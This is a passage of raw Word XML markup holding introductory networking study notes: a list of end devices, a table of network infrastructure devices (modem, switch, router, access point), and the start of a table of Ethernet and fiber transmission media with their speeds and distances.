        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Computers</w:t>
      </w:r>
      <w:r w:rsidRPr="006750A5">
        <w:t>: Desktops, laptops, servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42744CB7" w14:textId="4D34BF84" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006750A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Mobile </w:t>
      </w:r>
      <w:r w:rsidR="0002294E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="006750A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>evices</w:t>
      </w:r>
      <w:r w:rsidRPr="006750A5">
        <w:t>: Smartphones, tablets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AFF056" w14:textId="5C4D88F4" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006750A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">IoT </w:t>
      </w:r>
      <w:r w:rsidR="0002294E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="006750A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>evices</w:t>
      </w:r>
      <w:r w:rsidRPr="006750A5">
        <w:t>: Smart TVs, security cameras, smart thermostats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A3BD47" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006750A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network Attached Storage (NAS)</w:t>
      </w:r>
      <w:r w:rsidRPr="006750A5">
        <w:t>: Specialized storage devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2BB98C" w14:textId="61D96AC2" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="006750A5">
        <w:t>Network Infrastructure Devices</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1934"/>
        <w:gridCol w:w="6543"/>
        <w:gridCol w:w="5777"/>
      </w:tblGrid>
      <w:tr w:rsidR="006750A5" w:rsidRPr="006750A5" w14:paraId="36344F32" w14:textId="77777777" w:rsidTr="006750A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50F9A129" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Device</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13A87F09" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="421E2747" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Additional Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006750A5" w:rsidRPr="006750A5" w14:paraId="10BC7FA8" w14:textId="77777777" w:rsidTr="006750A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EB512A0" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Modem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43984E87" w14:textId="7A6E1C89" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t xml:space="preserve">Converts ISP </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">analog </w:t>
            </w:r>
            <w:r w:rsidRPr="006750A5">
              <w:t>signal (fiber/DSL/cable) into Ethernet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4509790B" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Types: DSL modem, cable modem, fiber modem</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006750A5" w:rsidRPr="006750A5" w14:paraId="2627C056" w14:textId="77777777" w:rsidTr="006750A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="130D5DB2" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Switch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02D034FC" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Expands number of wired Ethernet ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="088D4752" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Each port gets full bandwidth, reduces network collisions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006750A5" w:rsidRPr="006750A5" w14:paraId="1D4A7608" w14:textId="77777777" w:rsidTr="006750A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="508651BB" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Router</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BFA5696" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Shares internet to multiple devices, assigns IPs (DHCP), does NAT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DD8A8A9" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Routes data between different IP networks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006750A5" w:rsidRPr="006750A5" w14:paraId="356703A3" w14:textId="77777777" w:rsidTr="006750A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="055EAD0F" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Access Point (AP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C21BBD1" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Provides wireless connectivity to wired networks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="552F1093" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Extends network access to wireless devices</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="215DE27E" w14:textId="4555C794" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="006750A5">
        <w:t>Transmission Media</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1725"/>
        <w:gridCol w:w="2553"/>
        <w:gridCol w:w="4197"/>
        <w:gridCol w:w="5296"/>
      </w:tblGrid>
      <w:tr w:rsidR="006750A5" w:rsidRPr="006750A5" w14:paraId="116CA99D" w14:textId="77777777" w:rsidTr="006750A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29C6CBCC" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A852AA6" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Medium / Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71C1FE77" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Specs / Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A4C051B" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006750A5" w:rsidRPr="006750A5" w14:paraId="6A757AF6" w14:textId="77777777" w:rsidTr="006750A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10B3A67C" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Wired Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57068A3C" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Ethernet Cables – Cat5e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30F1F990" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Up to 1 Gbps, 100 m</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DFFD404" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Common for home/office networks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006750A5" w:rsidRPr="006750A5" w14:paraId="2B4347DB" w14:textId="77777777" w:rsidTr="006750A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37FB2395" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3890DA67" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Ethernet Cables – Cat6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28178201" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Up to 10 Gbps, 55 m</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28E31903" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Better performance; shorter distance for max speed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006750A5" w:rsidRPr="006750A5" w14:paraId="796972E5" w14:textId="77777777" w:rsidTr="006750A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F286623" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BE334CA" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Ethernet Cables – Cat6a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="366D0EB0" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Up to 10 Gbps, 100 m</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10D93F98" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Enhanced shielding for reduced interference</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006750A5" w:rsidRPr="006750A5" w14:paraId="120AB186" w14:textId="77777777" w:rsidTr="006750A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D69C2BC" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D6096C4" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Fiber Optic Cables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D84A955" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>10 Gbps – 400 Gbps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2560EA56" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Much higher speeds than copper</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006750A5" w:rsidRPr="006750A5" w14:paraId="7A9DD93F" w14:textId="77777777" w:rsidTr="006750A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F4911B6" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71393726" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B05AA4F" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
